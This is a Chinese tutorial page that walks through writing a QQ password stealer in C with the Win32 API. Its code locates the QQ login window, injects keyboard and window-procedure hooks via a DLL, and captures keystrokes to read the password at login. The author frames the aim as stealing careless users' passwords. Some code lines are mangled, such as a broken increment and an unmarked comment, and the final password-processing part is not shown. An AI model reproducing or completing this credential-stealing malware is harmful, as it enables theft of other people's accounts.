用VC 模拟实现QQ密码盗窃软件

天极软件专题专区精选 Google专区 POPO专区 QQ专区 Flash MX 视频教程 Photoshop视频教程 网页设计视频教程 PowerPoint动画演示教程 Excel动画教程集 Word动画演示教程 特洛伊木马专区 黑客知识教程专区 注册表应用专区 Windows API开发专区 网络编程专区 VB数据库编程专区 图像与多媒体编程 Windows Vista应用专区 防火墙应用专区
　　下载本文源代码

　　最近天气太热，外加无聊，出于练习的目的，想到了写个盗QQ的软件，说“盗”，未免是太难听了吧，于是我给它起名为“UiQQ道”.下面就是本软件的界面部分：

(图1．软件界面部分)

一般的盗密码的软件的软件都是通过监视键盘来获得密码，这样操作比较方便，但是这样也存在一定问题，密码有的时候不是很准确，因为有的人输入密码并不是从前到后输入，当然这样的人也是少数，盗密码嘛，当然去得到那些比较粗心的人的密码！ 通过安装钩子来监视QQ登陆界面就是获得密码的方法，在安装前得先找到登陆窗口的句柄，当钩子安装后，记录键盘，当用户“回车”或是点了“登陆”就可以开始处理密码了！ 我准备分为四部分来说明这个整个过程：

　　（1）寻找QQ登陆界面。

　　（2）安装钩子

　　（3）钩子函数的解释.

　　（4）处理密码。

　　以下部分全是使用C语言，文章中我假设读者您是会C/SDK编程的。如果遇到相关的概念性问题，您可以查看MSDN或是上BBS 询问！

　　第一部分：（1）寻找QQ登陆界面。

　　软件运行后，利用安装定时器，每秒在系统找QQ登陆界面，这样基本上只要用户打开了QQ登陆界面就会被抓住其句柄，看下面代码：

#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
　　
　　安装好TIMER后，下面是处理主程序的WM_TIMER消息，凡是出现没有定义的变量，您可以理解为是全局变量.

//处理WM_TIMER代码
   if (!IsWindow(g_hQQLogin))  //判断g_hQQLogin是否是有效的窗口句柄
   {
 HWND hLogin=NULL;
 g_hQQLogin = NULL;
 SetQQHook(NULL);      //参数为NULL是卸载HOOK，参数为句柄是安装句柄
 do
 {    
  //利用FindWindowEx查找QQ登陆窗口，具体参数意思请查MSDN
  g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL);  //对话框的类都是#32770
  //找到类名是#32770后，再在其窗体内找一个具有“  登录QQ”的BUTTON按纽
  //这一句很关键，如果你的QQ登陆窗口上没有"  登录QQ"字样，那么获取密码将失败！
  hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", "  登录QQ"); 
 }
        while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口，即：QQ登陆窗口

 if (g_hQQLogin != NULL)
 {
  SetQQHook(g_hQQLogin);//安装HOOK，此函数在DLL文件中 第二部分中介绍
 }    
   }

　　上面就是查找QQ登陆窗口句柄的过程，从代码可以看出我用的方法：找一个其子窗体中有一个标题为“ 登录QQ”的BUTTON的对话框（这句话说得有点饶口，这句话如果也看不懂，下面您不用看了：（） 我最开始是想利用 FindWindow(NULL,"QQ用户登陆窗口")来查找，但是我用Spy 看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”，而是“乱码”，其中包含了回车键等特殊字符，于是我用了FindWindowEx().

　　第二部分：（2）安装钩子

　　找到了QQ登陆窗口后，就成功了一半。

　　下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL（动态连接库）？要去“钩”其他进程的消息，得让HOOK函数在DLL中，这样好映射到其地址空间中！

BOOL WINAPI SetQQHook(HWND hQQLogin)
{
 //获得登陆框的句柄
 BOOL bRet = FALSE;
 if (hQQLogin != NULL)
 {
   DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL);  //这是什么意思？看MSDN
    
   g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ，此处不一样！ 得到QQ号的子窗口句柄
   g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ，此处不一样！得到QQ密码的子窗口句柄
  if (g_hNum == NULL)
  {
   MessageBox(NULL,"哭了，号码句柄都没有得到！","郁闷",0);
   return FALSE;
  }
  if(g_hPsw==NULL)
  {
   MessageBox(NULL,"哭了，密码句柄都没有得到！","郁闷",0);
   return FALSE;
  }
                分别键盘HOOK，和界面部分消息处理的HOOK
  g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
  g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
  bRet = (g_hProc != NULL) && (g_hKey != NULL);
 }
 else
 {
  // 卸载钩子
  bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
  g_hProc = NULL;
  g_hKey = NULL;
  g_hNum = NULL;
 }
 return bRet;
}

　　上面是安装HOOK部分的代码，就这么简单，上面提到了CallWndProc，KeyboardProc是两个回调函数，是我第三部分要解释的钩子函数

　　第三部分：（3）钩子函数的解释

　　CallWndProc，KeyboardProc是两个回调函数的原型和具体代码如下：

// 钩子过程，监视“登陆”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
 CWPSTRUCT *p = (CWPSTRUCT *)lParam;
        // 捕获“登陆”按钮
        if (p->message == WM_COMMAND && p->wParam ==16032)
        //下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
        //当用户点了登陆按钮，说明QQ号码和QQ密码已经填写完毕，当然可以去获得密码了
        GetPasswrod();  
        return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}

// 键盘钩子过程，监视“登陆”的热键消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
   // 捕获热键消息，记录键盘的按键盘过程,pmsg是PMSG类型的，i是全局Static类型的
   pmsg[i].wParam =wParam;
   i  ;
   if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆，用户用了回车后，就可以可以去获得密码了
   GetPasswrod();
   return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
			   
			   

                       标签：
                   
                   
版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com

特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有